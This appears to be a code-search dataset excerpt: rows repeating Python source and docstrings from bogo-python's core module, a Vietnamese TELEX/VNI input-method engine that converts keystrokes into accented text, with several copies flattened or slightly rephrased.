        # 'c' can't go after 'i' or 'ơ'
        return not (sound_tuple.last_consonant == 'c' and
                    vowel_wo_accent in ('i', 'ơ'))
    def has_valid_ng_ending():
        # 'ng' can't go after i, ơ (deliberately unused, see below)
        return not (sound_tuple.last_consonant == 'ng' and
                    vowel_wo_accent in ('i', 'ơ'))
    def has_valid_nh_ending():
        # 'nh' can only go after a, ê, uy, i, oa, quy (deliberately unused)
        has_y_but_is_not_quynh = vowel_wo_accent == 'y' and \
            sound_tuple.first_consonant != 'qu'
        has_invalid_vowel = not vowel_wo_accent in \
            ('a', 'ê', 'i', 'uy', 'oa', 'uê', 'y')
        return not \
            (sound_tuple.last_consonant == 'nh' and
                (has_invalid_vowel or has_y_but_is_not_quynh))
    # The ng and nh rules are not really phonetic but spelling rules.
    # Including them may hinder typing freedom and may prevent typing
    # unique local names.
    # FIXME: Config key, anyone?
    return \
        has_valid_vowel_form() and \
        has_valid_ch_ending() and \
        has_valid_c_ending()
    # has_valid_ng_ending() and \
    # has_valid_nh_ending()
def has_valid_accent(sound_tuple):
    """Check the tone accent against the final consonant.

    Words ending in the stop consonants c, p, t, ch can only carry
    the acute (sắc) or dot (nặng) accent.
    """
    tone = accent.get_accent_string(sound_tuple.vowel)
    if sound_tuple.last_consonant in ('c', 'p', 't', 'ch'):
        return tone in (Accent.ACUTE, Accent.DOT)
    return True
|
BoGoEngine/bogo-python | bogo/core.py | get_telex_definition | python | def get_telex_definition(w_shorthand=True, brackets_shorthand=True):
telex = {
"a": "a^",
"o": "o^",
"e": "e^",
"w": ["u*", "o*", "a+"],
"d": "d-",
"f": "\\",
"s": "/",
"r": "?",
"x": "~",
"j": ".",
}
if w_shorthand:
telex["w"].append('<ư')
if brackets_shorthand:
telex.update({
"]": "<ư",
"[": "<ơ",
"}": "<Ư",
"{": "<Ơ"
})
return telex | Create a definition dictionary for the TELEX input method
Args:
w_shorthand (optional): allow a stand-alone w to be
interpreted as an ư. Default to True.
brackets_shorthand (optional, True): allow typing ][ as
shorthand for ươ. Default to True.
Returns a dictionary to be passed into process_key(). | train | https://github.com/BoGoEngine/bogo-python/blob/9b85329a408ded4cead3539cecba12984d5d7650/bogo/core.py#L46-L81 | null | # -*- coding: utf-8 -*-
#
# This file is part of ibus-bogo project.
#
# Copyright (C) 2012 Long T. Dam <longdt90@gmail.com>
# Copyright (C) 2012-2013 Trung Ngo <ndtrung4419@gmail.com>
# Copyright (C) 2013 Duong H. Nguyen <cmpitg@gmail.com>
#
# ibus-bogo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ibus-bogo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ibus-bogo. If not, see <http://www.gnu.org/licenses/>.
#
"""
Read the docstring for process_sequence() and process_key() first.
"""
from __future__ import unicode_literals
from bogo.validation import is_valid_combination
from bogo import utils, accent, mark
import logging
import sys
import string
Mark = mark.Mark
Accent = accent.Accent
class _Action:
UNDO = 3
ADD_MARK = 2
ADD_ACCENT = 1
ADD_CHAR = 0
def get_vni_definition():
    """Build the transformation rules for the VNI input method.

    Returns a dictionary suitable for passing into process_key().
    """
    rules = {
        "1": "/",
        "2": "\\",
        "3": "?",
        "4": "~",
        "5": ".",
        "8": "a+",
        "9": "d-",
    }
    # Keys with more than one possible effect map to a list.
    rules["6"] = ["a^", "o^", "e^"]
    rules["7"] = ["u*", "o*"]
    return rules
def _accepted_chars(rules):
    """Return the set of characters the engine will try to process.

    Anything outside this set is treated as a word separator by
    process_sequence().
    """
    if sys.version_info[0] > 2:
        letters = string.ascii_letters
    else:
        # Python 2: join the two case tables explicitly.
        letters = string.lowercase + string.uppercase
    return set(letters + ''.join(rules.keys()) + utils.VOWELS + "đ")
def process_sequence(sequence,
                     rules=None,
                     skip_non_vietnamese=True):
    """\
    Convert a key sequence into a Vietnamese string with diacritical marks.

    Args:
        sequence: the raw keystrokes to convert.
        rules (optional): see docstring for process_key().
            Defaults to get_telex_definition().
        skip_non_vietnamese (optional): see docstring for process_key().

    It even supports continous key sequences connected by separators.
    i.e. process_sequence('con meof.ddieen') should work.
    """
    result = ""
    raw = result
    result_parts = []
    if rules is None:
        rules = get_telex_definition()
    accepted_chars = _accepted_chars(rules)
    for key in sequence:
        if key not in accepted_chars:
            # A separator: flush the word converted so far, emit the
            # separator verbatim and start a new word.
            result_parts.append(result)
            result_parts.append(key)
            result = ""
            raw = ""
        else:
            # Feed the key to the engine; `raw` carries the raw
            # keystrokes of the current word for undo handling.
            result, raw = process_key(
                string=result,
                key=key,
                fallback_sequence=raw,
                rules=rules,
                skip_non_vietnamese=skip_non_vietnamese)
    result_parts.append(result)
    return ''.join(result_parts)
def process_key(string, key,
fallback_sequence="", rules=None,
skip_non_vietnamese=True):
"""Process a keystroke.
Args:
string: The previously processed string or "".
key: The keystroke.
fallback_sequence: The previous keystrokes.
rules (optional): A dictionary listing
transformation rules. Defaults to get_telex_definition().
skip_non_vietnamese (optional): Whether to skip results that
doesn't seem like Vietnamese. Defaults to True.
Returns a tuple. The first item of which is the processed
Vietnamese string, the second item is the next fallback sequence.
The two items are to be fed back into the next call of process_key()
as `string` and `fallback_sequence`. If `skip_non_vietnamese` is
True and the resulting string doesn't look like Vietnamese,
both items contain the `fallback_sequence`.
>>> process_key('a', 'a', 'a')
(â, aa)
Note that when a key is an undo key, it won't get appended to
`fallback_sequence`.
>>> process_key('â', 'a', 'aa')
(aa, aa)
`rules` is a dictionary that maps keystrokes to
their effect string. The effects can be one of the following:
'a^': a with circumflex (â), only affect an existing 'a family'
'a+': a with breve (ă), only affect an existing 'a family'
'e^': e with circumflex (ê), only affect an existing 'e family'
'o^': o with circumflex (ô), only affect an existing 'o family'
'o*': o with horn (ơ), only affect an existing 'o family'
'd-': d with bar (đ), only affect an existing 'd'
'/': acute (sắc), affect an existing vowel
'\': grave (huyền), affect an existing vowel
'?': hook (hỏi), affect an existing vowel
'~': tilde (ngã), affect an existing vowel
'.': dot (nặng), affect an existing vowel
'<ư': append ư
'<ơ': append ơ
A keystroke entry can have multiple effects, in which case the
dictionary entry's value should be a list of the possible
effect strings. Although you should try to avoid this if
you are defining a custom input method rule.
"""
# TODO Figure out a way to remove the `string` argument. Perhaps only the
# key sequence is needed?
def default_return():
return string + key, fallback_sequence + key
if rules is None:
rules = get_telex_definition()
comps = utils.separate(string)
# if not _is_processable(comps):
# return default_return()
# Find all possible transformations this keypress can generate
trans_list = _get_transformation_list(
key, rules, fallback_sequence)
# Then apply them one by one
new_comps = list(comps)
for trans in trans_list:
new_comps = _transform(new_comps, trans)
if new_comps == comps:
tmp = list(new_comps)
# If none of the transformations (if any) work
# then this keystroke is probably an undo key.
if _can_undo(new_comps, trans_list):
# The prefix "_" means undo.
for trans in map(lambda x: "_" + x, trans_list):
new_comps = _transform(new_comps, trans)
# Undoing the w key with the TELEX input method with the
# w:<ư extension requires some care.
#
# The input (ư, w) should be undone as w
# on the other hand, (ư, uw) should return uw.
#
# _transform() is not aware of the 2 ways to generate
# ư in TELEX and always think ư was created by uw.
# Therefore, after calling _transform() to undo ư,
# we always get ['', 'u', ''].
#
# So we have to clean it up a bit.
def is_telex_like():
return '<ư' in rules["w"]
def undone_vowel_ends_with_u():
return new_comps[1] and new_comps[1][-1].lower() == "u"
def not_first_key_press():
return len(fallback_sequence) >= 1
def user_typed_ww():
return (fallback_sequence[-1:]+key).lower() == "ww"
def user_didnt_type_uww():
return not (len(fallback_sequence) >= 2 and
fallback_sequence[-2].lower() == "u")
if is_telex_like() and \
not_first_key_press() and \
undone_vowel_ends_with_u() and \
user_typed_ww() and \
user_didnt_type_uww():
# The vowel part of new_comps is supposed to end with
# u now. That u should be removed.
new_comps[1] = new_comps[1][:-1]
if tmp == new_comps:
fallback_sequence += key
new_comps = utils.append_comps(new_comps, key)
else:
fallback_sequence += key
if skip_non_vietnamese is True and key.isalpha() and \
not is_valid_combination(new_comps, final_form=False):
result = fallback_sequence, fallback_sequence
else:
result = utils.join(new_comps), fallback_sequence
return result
def _get_transformation_list(key, im, fallback_sequence):
"""
Return the list of transformations inferred from the entered key. The
map between transform types and keys is given by module
bogo_config (if exists) or by variable simple_telex_im
if entered key is not in im, return "+key", meaning appending
the entered key to current text
"""
# if key in im:
# lkey = key
# else:
# lkey = key.lower()
lkey = key.lower()
if lkey in im:
if isinstance(im[lkey], list):
trans_list = im[lkey]
else:
trans_list = [im[lkey]]
for i, trans in enumerate(trans_list):
if trans[0] == '<' and key.isalpha():
trans_list[i] = trans[0] + \
utils.change_case(trans[1], int(key.isupper()))
if trans_list == ['_']:
if len(fallback_sequence) >= 2:
# TODO Use takewhile()/dropwhile() to process the last IM keypress
# instead of assuming it's the last key in fallback_sequence.
t = list(map(lambda x: "_" + x,
_get_transformation_list(fallback_sequence[-2], im,
fallback_sequence[:-1])))
# print(t)
trans_list = t
# else:
# trans_list = ['+' + key]
return trans_list
else:
return ['+' + key]
def _get_action(trans):
    """Decode transformation string *trans* into (action, parameter).

    _Action.ADD_MARK is paired with a Mark value,
    _Action.ADD_ACCENT with an Accent value,
    _Action.ADD_CHAR with the character to append, and
    _Action.UNDO with the transformation string to revert.
    """
    # TODO: VIQR-like convention
    head = trans[0]
    if head in ('<', '+'):
        return _Action.ADD_CHAR, trans[1]
    if head == "_":
        return _Action.UNDO, trans[1:]
    if len(trans) == 2:
        # e.g. "a^", "o*", "d-": the second char names the mark.
        marks = {
            '^': Mark.HAT,
            '+': Mark.BREVE,
            '*': Mark.HORN,
            '-': Mark.BAR,
        }
        return _Action.ADD_MARK, marks[trans[1]]
    # Single-character transformations are accents.
    accents = {
        '\\': Accent.GRAVE,
        '/': Accent.ACUTE,
        '?': Accent.HOOK,
        '~': Accent.TIDLE,
        '.': Accent.DOT,
    }
    return _Action.ADD_ACCENT, accents[head]
def _transform(comps, trans):
"""
Transform the given string with transform type trans
"""
logging.debug("== In _transform(%s, %s) ==", comps, trans)
components = list(comps)
action, parameter = _get_action(trans)
if action == _Action.ADD_MARK and \
components[2] == "" and \
mark.strip(components[1]).lower() in ['oe', 'oa'] and trans == "o^":
action, parameter = _Action.ADD_CHAR, trans[0]
if action == _Action.ADD_ACCENT:
logging.debug("add_accent(%s, %s)", components, parameter)
components = accent.add_accent(components, parameter)
elif action == _Action.ADD_MARK and mark.is_valid_mark(components, trans):
logging.debug("add_mark(%s, %s)", components, parameter)
components = mark.add_mark(components, parameter)
# Handle uơ in "huơ", "thuở", "quở"
# If the current word has no last consonant and the first consonant
# is one of "h", "th" and the vowel is "ươ" then change the vowel into
# "uơ", keeping case and accent. If an alphabet character is then added
# into the word then change back to "ươ".
#
# NOTE: In the dictionary, these are the only words having this strange
# vowel so we don't need to worry about other cases.
if accent.remove_accent_string(components[1]).lower() == "ươ" and \
not components[2] and components[0].lower() in ["", "h", "th", "kh"]:
# Backup accents
ac = accent.get_accent_string(components[1])
components[1] = ("u", "U")[components[1][0].isupper()] + components[1][1]
components = accent.add_accent(components, ac)
elif action == _Action.ADD_CHAR:
if trans[0] == "<":
if not components[2]:
# Only allow ư, ơ or ươ sitting alone in the middle part
# and ['g', 'i', '']. If we want to type giowf = 'giờ', separate()
# will create ['g', 'i', '']. Therefore we have to allow
# components[1] == 'i'.
if (components[0].lower(), components[1].lower()) == ('g', 'i'):
components[0] += components[1]
components[1] = ''
if not components[1] or \
(components[1].lower(), trans[1].lower()) == ('ư', 'ơ'):
components[1] += trans[1]
else:
components = utils.append_comps(components, parameter)
if parameter.isalpha() and \
accent.remove_accent_string(components[1]).lower().startswith("uơ"):
ac = accent.get_accent_string(components[1])
components[1] = ('ư', 'Ư')[components[1][0].isupper()] + \
('ơ', 'Ơ')[components[1][1].isupper()] + components[1][2:]
components = accent.add_accent(components, ac)
elif action == _Action.UNDO:
components = _reverse(components, trans[1:])
if action == _Action.ADD_MARK or (action == _Action.ADD_CHAR and parameter.isalpha()):
# If there is any accent, remove and reapply it
# because it is likely to be misplaced in previous transformations
ac = accent.get_accent_string(components[1])
if ac != accent.Accent.NONE:
components = accent.add_accent(components, Accent.NONE)
components = accent.add_accent(components, ac)
logging.debug("After transform: %s", components)
return components
def _reverse(components, trans):
"""
Reverse the effect of transformation 'trans' on 'components'
If the transformation does not affect the components, return the original
string.
"""
action, parameter = _get_action(trans)
comps = list(components)
string = utils.join(comps)
if action == _Action.ADD_CHAR and string[-1].lower() == parameter.lower():
if comps[2]:
i = 2
elif comps[1]:
i = 1
else:
i = 0
comps[i] = comps[i][:-1]
elif action == _Action.ADD_ACCENT:
comps = accent.add_accent(comps, Accent.NONE)
elif action == _Action.ADD_MARK:
if parameter == Mark.BAR:
comps[0] = comps[0][:-1] + \
mark.add_mark_char(comps[0][-1:], Mark.NONE)
else:
if mark.is_valid_mark(comps, trans):
comps[1] = "".join([mark.add_mark_char(c, Mark.NONE)
for c in comps[1]])
return comps
def _can_undo(comps, trans_list):
    """
    Return whether `comps` can be undone by at least one of the
    transformations in `trans_list`.
    """
    comps = list(comps)
    # Accents present in the vowel part and marks present anywhere.
    accent_list = list(map(accent.get_accent_char, comps[1]))
    mark_list = list(map(mark.get_mark_char, utils.join(comps)))
    action_list = list(map(lambda x: _get_action(x), trans_list))
    def atomic_check(action):
        """
        Check if the `action` created one of the marks, accents, or characters
        in `comps`.
        """
        # NOTE(review): the ADD_CHAR branch reads comps[1][-1] and
        # raises IndexError for an empty vowel part — presumably
        # callers only reach it with a non-empty vowel; verify.
        return (action[0] == _Action.ADD_ACCENT and action[1] in accent_list) \
            or (action[0] == _Action.ADD_MARK and action[1] in mark_list) \
            or (action[0] == _Action.ADD_CHAR and action[1] == \
                accent.remove_accent_char(comps[1][-1]))  # ơ, ư
    return any(map(atomic_check, action_list))
def handle_backspace(converted_string, raw_sequence, im_rules=None):
    """
    Return a new raw_sequence after a backspace has deleted the last
    character of converted_string.  The result should be fed back into
    process_sequence() to regenerate the converted string.

    Example (TELEX rules):

        handle_backspace(thương, thuwongw) -> thuwonw
        handle_backspace(thươn, thuwonw)   -> thuwow
        handle_backspace(thươ, thuwow)     -> thuw
        handle_backspace(thươ, thuw)       -> th

    The algorithm was contributed by @hainp.
    """
    # Idiom fix: compare to None with `is`, not `==` (PEP 8).
    if im_rules is None:
        im_rules = get_telex_definition()
    deleted_char = converted_string[-1]
    _accent = accent.get_accent_char(deleted_char)
    _mark = mark.get_mark_char(deleted_char)
    if _mark or _accent:
        # The deleted char carries a diacritic, so several raw keys
        # may have produced it.  Scan backwards for the run of IM
        # keys at the end of raw_sequence.  (The original also
        # accumulated the run into an unused local; removed.)
        len_raw_sequence = len(raw_sequence)
        i = len_raw_sequence - 1
        while i >= 0:
            if raw_sequence[i] not in im_rules and \
                    raw_sequence[i] not in "aeiouyd":
                i += 1
                break
            else:
                i -= 1
        # NOTE(review): if the whole raw_sequence consists of IM keys
        # the loop leaves i == -1, and the slices below then start
        # from the end of the string rather than its beginning —
        # confirm this is the intended behaviour for such inputs.
        # Find the shortest tail of that run that converts exactly to
        # the deleted character, then chop it off.
        k = 0
        while k < len_raw_sequence:
            if process_sequence(raw_sequence[i + k:], im_rules) == deleted_char:
                # Delete that subsequence
                raw_sequence = raw_sequence[:i + k]
                break
            k += 1
    else:
        # Plain character: drop its right-most occurrence from the
        # raw sequence.
        index = raw_sequence.rfind(deleted_char)
        raw_sequence = raw_sequence[:index] + raw_sequence[(index + 1):]
    return raw_sequence
|
BoGoEngine/bogo-python | bogo/core.py | process_sequence | python | def process_sequence(sequence,
rules=None,
skip_non_vietnamese=True):
result = ""
raw = result
result_parts = []
if rules is None:
rules = get_telex_definition()
accepted_chars = _accepted_chars(rules)
for key in sequence:
if key not in accepted_chars:
result_parts.append(result)
result_parts.append(key)
result = ""
raw = ""
else:
result, raw = process_key(
string=result,
key=key,
fallback_sequence=raw,
rules=rules,
skip_non_vietnamese=skip_non_vietnamese)
result_parts.append(result)
return ''.join(result_parts) | \
Convert a key sequence into a Vietnamese string with diacritical marks.
Args:
rules (optional): see docstring for process_key().
skip_non_vietnamese (optional): see docstring for process_key().
It even supports continous key sequences connected by separators.
i.e. process_sequence('con meof.ddieen') should work. | train | https://github.com/BoGoEngine/bogo-python/blob/9b85329a408ded4cead3539cecba12984d5d7650/bogo/core.py#L114-L150 | [
"def process_key(string, key,\n fallback_sequence=\"\", rules=None,\n skip_non_vietnamese=True):\n \"\"\"Process a keystroke.\n\n Args:\n string: The previously processed string or \"\".\n key: The keystroke.\n fallback_sequence: The previous keystrokes.\n ... | # -*- coding: utf-8 -*-
#
# This file is part of ibus-bogo project.
#
# Copyright (C) 2012 Long T. Dam <longdt90@gmail.com>
# Copyright (C) 2012-2013 Trung Ngo <ndtrung4419@gmail.com>
# Copyright (C) 2013 Duong H. Nguyen <cmpitg@gmail.com>
#
# ibus-bogo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ibus-bogo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ibus-bogo. If not, see <http://www.gnu.org/licenses/>.
#
"""
Read the docstring for process_sequence() and process_key() first.
"""
from __future__ import unicode_literals
from bogo.validation import is_valid_combination
from bogo import utils, accent, mark
import logging
import sys
import string
Mark = mark.Mark
Accent = accent.Accent
class _Action:
UNDO = 3
ADD_MARK = 2
ADD_ACCENT = 1
ADD_CHAR = 0
def get_telex_definition(w_shorthand=True, brackets_shorthand=True):
    """Build the transformation rules for the TELEX input method.

    Args:
        w_shorthand (optional): allow a stand-alone w to be
            interpreted as an ư. Defaults to True.
        brackets_shorthand (optional): allow typing ] and [ as
            shorthand for ư and ơ. Defaults to True.

    Returns a dictionary to be passed into process_key().
    """
    w_effects = ["u*", "o*", "a+"]
    if w_shorthand:
        w_effects.append('<ư')
    rules = {
        "a": "a^",
        "o": "o^",
        "e": "e^",
        "w": w_effects,
        "d": "d-",
        "f": "\\",
        "s": "/",
        "r": "?",
        "x": "~",
        "j": ".",
    }
    if brackets_shorthand:
        rules["]"] = "<ư"
        rules["["] = "<ơ"
        rules["}"] = "<Ư"
        rules["{"] = "<Ơ"
    return rules
def get_vni_definition():
"""Create a definition dictionary for the VNI input method.
Returns a dictionary to be passed into process_key().
"""
return {
"6": ["a^", "o^", "e^"],
"7": ["u*", "o*"],
"8": "a+",
"9": "d-",
"2": "\\",
"1": "/",
"3": "?",
"4": "~",
"5": "."
}
def _accepted_chars(rules):
if sys.version_info[0] > 2:
ascii_letters = \
string.ascii_letters
else:
ascii_letters = \
string.lowercase + \
string.uppercase
return set(ascii_letters + ''.join(rules.keys()) + utils.VOWELS + "đ")
def process_key(string, key,
fallback_sequence="", rules=None,
skip_non_vietnamese=True):
"""Process a keystroke.
Args:
string: The previously processed string or "".
key: The keystroke.
fallback_sequence: The previous keystrokes.
rules (optional): A dictionary listing
transformation rules. Defaults to get_telex_definition().
skip_non_vietnamese (optional): Whether to skip results that
doesn't seem like Vietnamese. Defaults to True.
Returns a tuple. The first item of which is the processed
Vietnamese string, the second item is the next fallback sequence.
The two items are to be fed back into the next call of process_key()
as `string` and `fallback_sequence`. If `skip_non_vietnamese` is
True and the resulting string doesn't look like Vietnamese,
both items contain the `fallback_sequence`.
>>> process_key('a', 'a', 'a')
(â, aa)
Note that when a key is an undo key, it won't get appended to
`fallback_sequence`.
>>> process_key('â', 'a', 'aa')
(aa, aa)
`rules` is a dictionary that maps keystrokes to
their effect string. The effects can be one of the following:
'a^': a with circumflex (â), only affect an existing 'a family'
'a+': a with breve (ă), only affect an existing 'a family'
'e^': e with circumflex (ê), only affect an existing 'e family'
'o^': o with circumflex (ô), only affect an existing 'o family'
'o*': o with horn (ơ), only affect an existing 'o family'
'd-': d with bar (đ), only affect an existing 'd'
'/': acute (sắc), affect an existing vowel
'\': grave (huyền), affect an existing vowel
'?': hook (hỏi), affect an existing vowel
'~': tilde (ngã), affect an existing vowel
'.': dot (nặng), affect an existing vowel
'<ư': append ư
'<ơ': append ơ
A keystroke entry can have multiple effects, in which case the
dictionary entry's value should be a list of the possible
effect strings. Although you should try to avoid this if
you are defining a custom input method rule.
"""
# TODO Figure out a way to remove the `string` argument. Perhaps only the
# key sequence is needed?
def default_return():
return string + key, fallback_sequence + key
if rules is None:
rules = get_telex_definition()
comps = utils.separate(string)
# if not _is_processable(comps):
# return default_return()
# Find all possible transformations this keypress can generate
trans_list = _get_transformation_list(
key, rules, fallback_sequence)
# Then apply them one by one
new_comps = list(comps)
for trans in trans_list:
new_comps = _transform(new_comps, trans)
if new_comps == comps:
tmp = list(new_comps)
# If none of the transformations (if any) work
# then this keystroke is probably an undo key.
if _can_undo(new_comps, trans_list):
# The prefix "_" means undo.
for trans in map(lambda x: "_" + x, trans_list):
new_comps = _transform(new_comps, trans)
# Undoing the w key with the TELEX input method with the
# w:<ư extension requires some care.
#
# The input (ư, w) should be undone as w
# on the other hand, (ư, uw) should return uw.
#
# _transform() is not aware of the 2 ways to generate
# ư in TELEX and always think ư was created by uw.
# Therefore, after calling _transform() to undo ư,
# we always get ['', 'u', ''].
#
# So we have to clean it up a bit.
def is_telex_like():
return '<ư' in rules["w"]
def undone_vowel_ends_with_u():
return new_comps[1] and new_comps[1][-1].lower() == "u"
def not_first_key_press():
return len(fallback_sequence) >= 1
def user_typed_ww():
return (fallback_sequence[-1:]+key).lower() == "ww"
def user_didnt_type_uww():
return not (len(fallback_sequence) >= 2 and
fallback_sequence[-2].lower() == "u")
if is_telex_like() and \
not_first_key_press() and \
undone_vowel_ends_with_u() and \
user_typed_ww() and \
user_didnt_type_uww():
# The vowel part of new_comps is supposed to end with
# u now. That u should be removed.
new_comps[1] = new_comps[1][:-1]
if tmp == new_comps:
fallback_sequence += key
new_comps = utils.append_comps(new_comps, key)
else:
fallback_sequence += key
if skip_non_vietnamese is True and key.isalpha() and \
not is_valid_combination(new_comps, final_form=False):
result = fallback_sequence, fallback_sequence
else:
result = utils.join(new_comps), fallback_sequence
return result
def _get_transformation_list(key, im, fallback_sequence):
"""
Return the list of transformations inferred from the entered key. The
map between transform types and keys is given by module
bogo_config (if exists) or by variable simple_telex_im
if entered key is not in im, return "+key", meaning appending
the entered key to current text
"""
# if key in im:
# lkey = key
# else:
# lkey = key.lower()
lkey = key.lower()
if lkey in im:
if isinstance(im[lkey], list):
trans_list = im[lkey]
else:
trans_list = [im[lkey]]
for i, trans in enumerate(trans_list):
if trans[0] == '<' and key.isalpha():
trans_list[i] = trans[0] + \
utils.change_case(trans[1], int(key.isupper()))
if trans_list == ['_']:
if len(fallback_sequence) >= 2:
# TODO Use takewhile()/dropwhile() to process the last IM keypress
# instead of assuming it's the last key in fallback_sequence.
t = list(map(lambda x: "_" + x,
_get_transformation_list(fallback_sequence[-2], im,
fallback_sequence[:-1])))
# print(t)
trans_list = t
# else:
# trans_list = ['+' + key]
return trans_list
else:
return ['+' + key]
def _get_action(trans):
"""
Return the action inferred from the transformation `trans`.
and the parameter going with this action
An _Action.ADD_MARK goes with a Mark
while an _Action.ADD_ACCENT goes with an Accent
"""
# TODO: VIQR-like convention
mark_action = {
'^': (_Action.ADD_MARK, Mark.HAT),
'+': (_Action.ADD_MARK, Mark.BREVE),
'*': (_Action.ADD_MARK, Mark.HORN),
'-': (_Action.ADD_MARK, Mark.BAR),
}
accent_action = {
'\\': (_Action.ADD_ACCENT, Accent.GRAVE),
'/': (_Action.ADD_ACCENT, Accent.ACUTE),
'?': (_Action.ADD_ACCENT, Accent.HOOK),
'~': (_Action.ADD_ACCENT, Accent.TIDLE),
'.': (_Action.ADD_ACCENT, Accent.DOT),
}
if trans[0] in ('<', '+'):
return _Action.ADD_CHAR, trans[1]
if trans[0] == "_":
return _Action.UNDO, trans[1:]
if len(trans) == 2:
return mark_action[trans[1]]
else:
return accent_action[trans[0]]
def _transform(comps, trans):
"""
Transform the given string with transform type trans
"""
logging.debug("== In _transform(%s, %s) ==", comps, trans)
components = list(comps)
action, parameter = _get_action(trans)
if action == _Action.ADD_MARK and \
components[2] == "" and \
mark.strip(components[1]).lower() in ['oe', 'oa'] and trans == "o^":
action, parameter = _Action.ADD_CHAR, trans[0]
if action == _Action.ADD_ACCENT:
logging.debug("add_accent(%s, %s)", components, parameter)
components = accent.add_accent(components, parameter)
elif action == _Action.ADD_MARK and mark.is_valid_mark(components, trans):
logging.debug("add_mark(%s, %s)", components, parameter)
components = mark.add_mark(components, parameter)
# Handle uơ in "huơ", "thuở", "quở"
# If the current word has no last consonant and the first consonant
# is one of "h", "th" and the vowel is "ươ" then change the vowel into
# "uơ", keeping case and accent. If an alphabet character is then added
# into the word then change back to "ươ".
#
# NOTE: In the dictionary, these are the only words having this strange
# vowel so we don't need to worry about other cases.
if accent.remove_accent_string(components[1]).lower() == "ươ" and \
not components[2] and components[0].lower() in ["", "h", "th", "kh"]:
# Backup accents
ac = accent.get_accent_string(components[1])
components[1] = ("u", "U")[components[1][0].isupper()] + components[1][1]
components = accent.add_accent(components, ac)
elif action == _Action.ADD_CHAR:
if trans[0] == "<":
if not components[2]:
# Only allow ư, ơ or ươ sitting alone in the middle part
# and ['g', 'i', '']. If we want to type giowf = 'giờ', separate()
# will create ['g', 'i', '']. Therefore we have to allow
# components[1] == 'i'.
if (components[0].lower(), components[1].lower()) == ('g', 'i'):
components[0] += components[1]
components[1] = ''
if not components[1] or \
(components[1].lower(), trans[1].lower()) == ('ư', 'ơ'):
components[1] += trans[1]
else:
components = utils.append_comps(components, parameter)
if parameter.isalpha() and \
accent.remove_accent_string(components[1]).lower().startswith("uơ"):
ac = accent.get_accent_string(components[1])
components[1] = ('ư', 'Ư')[components[1][0].isupper()] + \
('ơ', 'Ơ')[components[1][1].isupper()] + components[1][2:]
components = accent.add_accent(components, ac)
elif action == _Action.UNDO:
components = _reverse(components, trans[1:])
if action == _Action.ADD_MARK or (action == _Action.ADD_CHAR and parameter.isalpha()):
# If there is any accent, remove and reapply it
# because it is likely to be misplaced in previous transformations
ac = accent.get_accent_string(components[1])
if ac != accent.Accent.NONE:
components = accent.add_accent(components, Accent.NONE)
components = accent.add_accent(components, ac)
logging.debug("After transform: %s", components)
return components
def _reverse(components, trans):
"""
Reverse the effect of transformation 'trans' on 'components'
If the transformation does not affect the components, return the original
string.
"""
action, parameter = _get_action(trans)
comps = list(components)
string = utils.join(comps)
if action == _Action.ADD_CHAR and string[-1].lower() == parameter.lower():
if comps[2]:
i = 2
elif comps[1]:
i = 1
else:
i = 0
comps[i] = comps[i][:-1]
elif action == _Action.ADD_ACCENT:
comps = accent.add_accent(comps, Accent.NONE)
elif action == _Action.ADD_MARK:
if parameter == Mark.BAR:
comps[0] = comps[0][:-1] + \
mark.add_mark_char(comps[0][-1:], Mark.NONE)
else:
if mark.is_valid_mark(comps, trans):
comps[1] = "".join([mark.add_mark_char(c, Mark.NONE)
for c in comps[1]])
return comps
def _can_undo(comps, trans_list):
"""
Return whether a components can be undone with one of the transformation in
trans_list.
"""
comps = list(comps)
accent_list = list(map(accent.get_accent_char, comps[1]))
mark_list = list(map(mark.get_mark_char, utils.join(comps)))
action_list = list(map(lambda x: _get_action(x), trans_list))
def atomic_check(action):
"""
Check if the `action` created one of the marks, accents, or characters
in `comps`.
"""
return (action[0] == _Action.ADD_ACCENT and action[1] in accent_list) \
or (action[0] == _Action.ADD_MARK and action[1] in mark_list) \
or (action[0] == _Action.ADD_CHAR and action[1] == \
accent.remove_accent_char(comps[1][-1])) # ơ, ư
return any(map(atomic_check, action_list))
def handle_backspace(converted_string, raw_sequence, im_rules=None):
"""
Returns a new raw_sequence after a backspace. This raw_sequence should
be pushed back to process_sequence().
"""
# I can't find a simple explanation for this, so
# I hope this example can help clarify it:
#
# handle_backspace(thương, thuwongw) -> thuwonw
# handle_backspace(thươn, thuwonw) -> thuwow
# handle_backspace(thươ, thuwow) -> thuw
# handle_backspace(thươ, thuw) -> th
#
# The algorithm for handle_backspace was contributed by @hainp.
if im_rules == None:
im_rules = get_telex_definition()
deleted_char = converted_string[-1]
_accent = accent.get_accent_char(deleted_char)
_mark = mark.get_mark_char(deleted_char)
if _mark or _accent:
# Find a sequence of IM keys at the end of
# raw_sequence
ime_keys_at_end = ""
len_raw_sequence = len(raw_sequence)
i = len_raw_sequence - 1
while i >= 0:
if raw_sequence[i] not in im_rules and \
raw_sequence[i] not in "aeiouyd":
i += 1
break
else:
ime_keys_at_end = raw_sequence[i] + ime_keys_at_end
i -= 1
# Try to find a subsequence from that sequence
# that can be converted to the deleted_char
k = 0
while k < len_raw_sequence:
if process_sequence(raw_sequence[i + k:], im_rules) == deleted_char:
# Delete that subsequence
raw_sequence = raw_sequence[:i + k]
break
k += 1
else:
index = raw_sequence.rfind(deleted_char)
raw_sequence = raw_sequence[:index] + raw_sequence[(index + 1):]
return raw_sequence
|
BoGoEngine/bogo-python | bogo/core.py | process_key | python | def process_key(string, key,
fallback_sequence="", rules=None,
skip_non_vietnamese=True):
# TODO Figure out a way to remove the `string` argument. Perhaps only the
# key sequence is needed?
def default_return():
return string + key, fallback_sequence + key
if rules is None:
rules = get_telex_definition()
comps = utils.separate(string)
# if not _is_processable(comps):
# return default_return()
# Find all possible transformations this keypress can generate
trans_list = _get_transformation_list(
key, rules, fallback_sequence)
# Then apply them one by one
new_comps = list(comps)
for trans in trans_list:
new_comps = _transform(new_comps, trans)
